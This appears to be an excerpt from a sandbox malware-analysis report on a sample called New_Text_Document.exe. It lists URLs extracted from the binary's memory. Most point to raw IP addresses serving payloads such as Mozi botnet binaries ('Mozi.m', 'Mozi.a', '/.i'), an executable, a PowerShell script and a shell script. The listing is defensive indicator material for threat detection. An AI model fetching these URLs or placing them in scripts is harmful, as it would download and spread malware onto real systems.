                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.182.2/race/bus50.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.116.222.140:23105/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.116.81.206:57205/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.125.133.101:54456/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.125.141.29:31978/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.127.90.14:16616/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.128.33.208:27927/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.160.49.161:14916/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.168.144.26:29521/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.168.86.195:15701/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.195.82.21:32288/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.235.189.104:7992/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.251.89.47:24826/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.92.181.49:28800/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.92.28.89:36032/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.96.94.148:38682/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.99.116.230:42226/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.99.37.97:51744/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.99.37.97:51744/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.99.37.97:51744/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.99.37.97:51744/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.182.42.53:23490/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.124.170:45083/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.126.251:18898/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.126.26:16977/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.127.181:40849/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.167.121:64573/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.23.84:33424/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.23.84:33424/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.23.84:33424/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.23.84:33424/g
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.23.84:33424/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.24.110:26781/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.240.114:49976/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.50.27:19600/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.55.196:24479/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.185.63.165:53565/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.70.30.138:59492/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.70.30.157:1593/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.70.31.21:57080/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.90.151.233/getdata.ps1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.161.213.134:33445/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.162.152.226:23934/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.163.19.131:51827/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.163.190.243:19403/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.164.107.111:23838/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.164.3.229:32036/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.166.251.43:56346/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.168.147.235:38180/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.172.13.40:6249/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.172.2.160:8986/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.184.110.13:53172/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.186.210.92:58373/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.186.96.252:17572/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.187.249.34:56320/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.187.40.175:16279/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.227.202.254:39225/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.239.99.27:37295/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.31.72.39:37569/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.42.90:29620/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.106.167.11/x/1sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.214.56.228:41018/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.214.56.231:24682/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.214.56.234:44138/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.214.56.235:7880/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.26.89.215:36857/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.239.50.205:27185/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.35.178.132:16876/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.165.220.243:41329/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.213.179.34:54407/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.243.33.22:10777/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.50.41.200:55598/Mozi.m
